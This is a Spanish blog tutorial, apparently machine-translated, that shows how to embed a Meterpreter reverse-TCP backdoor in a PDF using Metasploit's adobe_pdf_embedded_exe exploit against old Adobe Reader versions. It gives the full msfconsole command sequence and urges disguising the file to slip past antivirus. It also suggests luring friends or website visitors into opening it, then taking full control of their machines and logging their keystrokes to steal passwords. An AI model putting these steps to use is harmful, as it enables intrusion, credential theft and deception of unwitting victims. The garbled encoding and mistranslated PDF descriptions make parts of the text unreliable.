Hacking Avanzado en PDF (Backdoor/Backtrack)

Hacking avanzado. Inyectar un Backdoor en un PDF y tomar el control total de una PC.



Distribución de software malicioso dentro de documentos PDF de Adobe

Distribución de software malicioso dentro de documentos PDF de Adobe
Esta vez, les darĆ© una preve lección de como   inyección un (rootkit) dentro de un archivo PDF, explotando una vulnerabilidad en Adobe Reader.

Distribución de software malicioso dentro de documentos PDF de Adobe es un mĆ©todo popular para los atacantes, para comprometer sistemas.  

Dentro de las Ćŗltimas versiones de Reader, Adobe ha aƱadido mĆŗltiples actualizaciones para solucionar vulnerabilidades. AdemĆ”s, Adobe ha aƱadido una capacidad de caja de arena en el software  Reader, que se activa si los atacantes utilizan vulnerabilidades de PDF para intentar explotar de un sistema. Debido a esta adición caja de arena, los atacantes se quedan con un acceso extremadamente limitado y temporal, limitando lo que puede lograrse.
 
Hackers-v-Adobe

 Vamos a empezar por examinar cómo se construyen los archivos PDF. Los siguientes son los principales componentes de un archivo PDF.
 
PDF Header
  
La primera línea de un archivo PDF muestra la versión en formato pdf. Por ejemplo, "% PDF-1.4 significa que es cuarta versión del archivo.
 
 PDF Cuerpo
 
El cuerpo del archivo PDF se compone de objetos que se utilizan para definir el contenido del documento. Estos objetos incluyen fuentes, imÔgenes, anotaciones y flujos de texto. Los usuarios también pueden insertar objetos o elementos invisibles en el cuerpo del documento, lo que puede permitir a las características PDF como funciones de animación o de seguridad.
 
La tabla de referencias cruzadas (cuadro de referencia externa)

 La tabla de referencias cruzadas vincula todos los objetos y elementos que existen en el documento, y se almacena en formato de archivo. Puede utilizar esta función para ver otros contenidos de la pĆ”gina. Cuando los usuarios actualizan un documento PDF, la tabla de referencias cruzadas tambiĆ©n se actualiza automĆ”ticamente.
 
El Remolque

El Remolque contiene enlaces a la tabla de referencias cruzadas y siempre tiene %% EOF al final, que identifica el final de un archivo PDF. El remolque permite al usuario navegar a la siguiente pƔgina, haga clic en el enlace proporcionado.
 
Desde la perspectiva atacante ...
PDF malicioso a travƩs de Metasploit

Vamos a utilizar Metasploit en Backtrack para crear un archivo PDF malicioso.
 
Este exploit se pueden crear en el marco de Metasploit, asƭ que vamos a crear el PDF malicioso y luego realizar un anƔlisis en Backtrack en tiempo real.
 
Queremos ganar acceso a una consola en el ordenador de la víctima y ejecutar un capturador de teclado para recoger contraseñas u otra información crítica.
 
Comenzamos por la carga de nuestra msfconsole. Una guƭa que les podrƭa servir en la seguridad informƔtica estƔ aquƭ abajo.
 
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

Pero la mayorƭa de las guias de Offensive Security son en inglƩs.
 
Por otro lado..
Queremos poner nuestras habilidades de ingenierĆ­a social para la prueba aquĆ­. Recomiendo que cuando practicas crear estos archivos, intenta hacer que su archivo PDF se vea tan legĆ­tima como sea posible. 

Esto construye buenos hÔbitos. También querer evitar los sistemas antivirus y capacidades de detección de malware, proporcionando a su archivo PDF con un buen título, pÔginas adecuadas, y el contenido legítimo.

 
Adobe Reader es propenso a una vulnerabilidad de desbordamiento de bĆŗfer basado en pila porque la aplicación no puede realizar comprobaciones de lĆ­mites adecuados sobre los datos suministrados por el usuario. 

 Un atacante puede aprovechar este problema y ejecutar código arbitrario mediante el acceso a los privilegios de un usuario vĆ”lido que se ejecuta la aplicación. 

 El atacante tambiĆ©n puede bloquear la aplicación, lo que se traduce en el servicio negado a los usuarios legĆ­timos.
Aunque se trata de una vulnerabilidad mayor, muchas vulnerabilidades nuevas funcionan de una manera similar. 

 Los atacantes, generalmente, tratar de tomar ventaja de un ataque de dĆ­a cero con el fin de lograr resultados similares a lo que vamos a ver aquĆ­.
 
Vamos a empezar por la creación de nuestro archivo PDF malicioso para su uso en este lado del cliente exploit.


La vulnerabilidad

Adobe ha tenido numerosos problemas de seguridad con sus productos, incluyendo Problema AdoEl

Entre los productos de Adobe mƔs utilizados es Reader.
 
Casi todos los equipos tienen alguna versión de Adobe Reader en él para la lectura de archivos PDF.
 
Es probable que tu lo tengas tambiƩn. Pero, la mayorƭa de las personas no son conscientes de los problemas de seguridad que Reader ha experimentado y que dejar de actualizar o parchear.

De acuerdo con el fabricante de software antivirus Avast, mĆ”s del 60 por ciento de las computadoras tiene Adobe Reader 9 o instalado antes, a pesar de que la nueva versión es 11. 
 
Por lo tanto, hoy vamos a explotar esos equipos con Adobe Reader 9 o anterior.

El Exploit

En este exploit, vamos a modificar un archivo .pdf existente que luego puede ser publicado en nuestra pƔgina web. Cuando los amigos u otras personas que descarga, se abrirƔ un oyente (un rootkit) en su sistema y nos dan un control total de su ordenador de forma remota.

Vamos a empezar por abrir Metasploit. Si no ha actualizado su Metasploit , este serĆ­a un buen momento para hacerlo. Simplemente escriba msfupdate en el indicador de MSF.

Paso 1: Encuentra el exploit  adecuado

En primer lugar, vamos a encontrar el exploit adecuado en Metasploit buscando uno que va a utilizar esta versión de Adobe Reader: 
 
msf > search type:exploit platform:windows adobe pdf
 
 
 
 
 
 
 
En la imagen anterior podemos ver que Metasploit enumeró todas las hazañas que cumplieron con los criterios.
 
Usemos el "exploit/windows/fileformat/adobe_pdf_embedded_exe".
 
Comando:
 
 msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Paso 2: Reunir información sobre este Exploit

Ahora echemos un vistazo a la información de que disponemos acerca de este exploit con el siguente comando: 
 
msf > exploit (adobe_pdf_embedded_exe) > info
 
 
 
 
 
 
 
 
Tenga en cuenta que en la descripción, Metasploit nos dice que incrusta un payload en un archivo PDF existente. El PDF resultante puede ser enviada a un objetivo como parte de un ataque de ingeniería social. :)



AdemĆ”s de enviar por una red social a la vĆ­ctima, tambiĆ©n se puede incrustar con un script en lenguaje de html en un sitio web (UsarĆ© IMVU como ejemplo) DespuĆ©s invitaremos a la vĆ­ctima  a descargarlo.
 
 
 

 

Paso 3: Configurar Nuestra Payload

En nuestro siguiente paso, tenemos que inyectar nuestro payload   en el PDF. 
 
Escribe:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Paso 4: Establecer opciones

Ahora que hemos elegido nuestri exploit y configurar nuestro payload, lo único que queda por hacer es configurar nuestras opciones. Echemos un vistazo a las opciones para esta hazaña y el payload, escribiendo el siguente comando:
 
msf > exploit (adobe_pdf_embedded_exe) > show options
 
 
 
 
 
 
 
 
 
 
Como se puede ver en la imagen anterior, Metasploit nos obliga a dar un PDF existente donde se puede incrustar el Meterpreter.
 
Vamos a establecer un archivo llamado hackedpfd.pdf (asegurarse de que este archivo se creó con Reader 9 o anterior), con nuestra opción INFILENAME.msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME hackedpdf.pdf
 
A continuación, cambie el nombre de archivo predeterminado del archivo de salida con el Meterpreter incorporado para la misma Hackedpdf.pdf, ya que eso suena malicioso. XD
 
El nombre predeterminado es backdoor.pdf
 
 msf > exploit (adobe_pdf_embedded_exe) > set FILENAME backdoor.pdf
 
A continuación, establezca el LHOST (nuestro sistema) a nuestra dirección IP o 192.168.100.1.

msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1

 

Paso 5: Compruebe los ajustes

 

Ahora, vamos a ver nuestras opciones de nuevo para ver si todo estĆ” listo para el hackeo.msf > exploit (adobe_pdf_embedded_exe) > show options

 

 

 

Paso 6: Exploit! :)

Como se puede ver en la imagen de arriba, todas nuestras opciones se establecen todo lo que necesitamos hacer ahora es darle exploit

msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit ha creado un backdoor.pdf llamado PDF que contiene el rootkit Meterpeter. Metasploit ha colocado este archivo en /root/.msf4/local/backdoor.pdf.


 
Basta con copiar este archivo en cualquier  sitio web e invitar a los visitantes a descargarlo. Cuando nuestra victima/s  abren este archivo , se abrirĆ” una conexión con el sistema que se puede utilizar para correr y tener control de su sistema completo.




 


Ɖste tutorial te servirĆ” una vez que tengas el control de la PC con Meterpreter, donde verĆ”s todo lo que puedes hacer una vez teniendo acceso a la PC.
 

http://cyberattacking.blogspot.mx/2015/10/hacking-completo-una-pc-meterpreter.html 

Suerte!


Exploit

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Instagram